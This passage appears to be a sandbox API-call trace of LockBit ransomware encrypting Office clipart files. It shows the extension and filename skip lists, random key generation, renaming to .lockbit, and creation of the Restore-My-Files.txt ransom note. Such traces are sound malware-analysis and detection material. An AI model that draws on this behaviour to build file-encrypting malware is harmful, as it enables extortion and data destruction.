Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285782.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285782.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.422] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.422] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.423] free (_Block=0x1fa2ed8) [0154.423] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285782.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.423] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.423] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.424] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285792.WMF", cAlternateFileName="")) returned 1 [0154.424] lstrcmpiW (lpString1=".", lpString2="J0285792.WMF") returned -1 [0154.424] lstrcmpiW (lpString1="..", lpString2="J0285792.WMF") returned -1 [0154.424] PathFindExtensionW (pszPath="J0285792.WMF") returned=".WMF" [0154.424] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.424] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.425] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.425] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285792.WMF") returned 1 [0154.426] lstrcmpiW (lpString1="ntldr", lpString2="J0285792.WMF") returned 1 [0154.426] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285792.WMF") returned 1 [0154.426] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285792.WMF") returned -1 [0154.426] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285792.WMF") returned -1 [0154.426] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285792.WMF") returned 1 [0154.426] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285792.WMF") returned -1 [0154.426] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.426] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285792.WMF") returned=".WMF" [0154.426] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.426] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.427] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.427] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.428] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.428] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.428] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285792.WMF.lockbit") returned 72 [0154.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285792.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285792.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0154.429] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.429] malloc (_Size=0x40068) returned 0x3d70450 [0154.429] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=11956) returned 1 [0154.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.429] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0154.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0154.430] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0154.435] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285792.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285792.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.435] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.435] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.436] free (_Block=0x1fa2ed8) [0154.436] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285792.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.436] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.436] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.436] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56667970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3550, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285796.WMF", cAlternateFileName="")) returned 1 [0154.436] lstrcmpiW (lpString1=".", lpString2="J0285796.WMF") returned -1 [0154.436] lstrcmpiW (lpString1="..", lpString2="J0285796.WMF") returned -1 [0154.436] PathFindExtensionW (pszPath="J0285796.WMF") returned=".WMF" [0154.436] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.436] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.436] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.436] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.436] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.437] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.437] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.438] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285796.WMF") returned 1 [0154.438] lstrcmpiW (lpString1="ntldr", lpString2="J0285796.WMF") returned 1 [0154.438] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285796.WMF") returned 1 [0154.438] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285796.WMF") returned -1 [0154.438] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285796.WMF") returned -1 [0154.439] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285796.WMF") returned 1 [0154.439] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285796.WMF") returned -1 [0154.439] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.439] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285796.WMF") returned=".WMF" [0154.439] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.439] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.439] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.440] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.440] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285796.WMF.lockbit") returned 72 [0154.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285796.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285796.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.441] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.441] malloc (_Size=0x40068) returned 0x3df0008 [0154.441] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13648) returned 1 [0154.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.442] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.442] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.448] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285796.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285796.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.448] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.448] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.449] free (_Block=0x1fa2ed8) [0154.449] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285796.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.449] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.450] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.450] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x23f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285808.WMF", cAlternateFileName="")) returned 1 [0154.450] lstrcmpiW (lpString1=".", lpString2="J0285808.WMF") returned -1 [0154.450] lstrcmpiW (lpString1="..", lpString2="J0285808.WMF") returned -1 [0154.450] PathFindExtensionW (pszPath="J0285808.WMF") returned=".WMF" [0154.450] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.450] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.451] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.451] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.452] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285808.WMF") returned 1 [0154.452] lstrcmpiW (lpString1="ntldr", lpString2="J0285808.WMF") returned 1 [0154.452] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285808.WMF") returned 1 [0154.452] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285808.WMF") returned -1 [0154.452] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285808.WMF") returned -1 [0154.452] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285808.WMF") returned 1 [0154.452] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285808.WMF") returned -1 [0154.452] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.452] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285808.WMF") returned=".WMF" [0154.452] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.452] 